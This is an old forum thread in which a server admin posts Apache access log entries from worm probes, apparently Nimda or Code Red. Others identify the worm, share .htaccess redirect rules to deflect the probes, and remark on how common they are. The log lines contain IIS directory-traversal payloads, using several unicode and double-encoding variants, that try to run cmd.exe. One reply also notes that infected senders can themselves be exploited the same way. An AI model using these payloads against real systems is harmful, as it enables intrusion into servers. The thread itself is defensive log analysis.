apache access.log

[blakdeth77]

So... ah... from the strings I see here from my access log... I'm guessing this was either some skiddie trying to get in or... maybe a virus trying to spread itself... is that an accurate assumption or...?


66.128.109.148 - - [27/Nov/2002:23:20:22 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 278 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:22 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:23 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:23 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:24 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:24 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:25 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:26 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:26 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:26 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:27 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:27 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:27 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:28 -0600] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:28 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-"
66.128.109.148 - - [27/Nov/2002:23:20:29 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-"



And is there a way for me to make apache just deny any requests from this other machine? I've found quite a few more and I think another host is actually doing this same routine as we speak.

[Ratman2]

Looks VERY much like Nimda/Code red

[blakdeth77]

yeah its like... i figured it couldnt be a real human hack attempt cause of the rate of the URL requests or whatever... theres like two per second sometimes.

[tiger_r_]

That's probably one of the Internet worms looking for an unpatched IIS server (Commonly Code Red). If you use UNIX, you don't have to worry about these log entries as they don't affect Apache, if you use Windows, make sure you are fully patched.

I have the following lines at the end of my .htaccess file:

Code:

redirect /scripts http://www.whatever.invalid/
redirect /MSADC http://www.whatever.invalid/
redirect /c http://www.whatever.invalid/
redirect /d http://www.whatever.invalid/
redirect /_mem_bin http://whatever.invalid/
redirect /msadc http://whatever.invalid/
RedirectMatch (.*)\cmd.exe$ http://whatever.invalid/$1

[ammo]

Just for fun, grep | wc -l your access_log and error_log for "cmd.exe" and see how many log entries there are for such IIS hack attempts: it's mind boggling!

On a low traffic apache server at work, I get 2712 hits for cmd.exe (log starts june 14)!!

Ammo

[blakdeth77]

Im running it on an XP machine... its just going to be up for a while to test a website so this client can look at it but... man... I am really surprised how often this is going... its crazy to see how many times my machine gets hit with that... I thought code red and the like were all but gone! Guess not!

[the_JinX]

propably someone infected with as stated before, the code-red or nimda virus..

the funny thing is, you can use this against them..
When I was a mere scriptkiddie, I would search my logs for these and the fact is, if they have this worm, they can also be exploited via the unicode bug

Not that any of us would ever do so.. so you can mail the man/woman behind the IP and tell them theyve got a serious problem..


Linux: don't be part of the probelem, be part of the solution..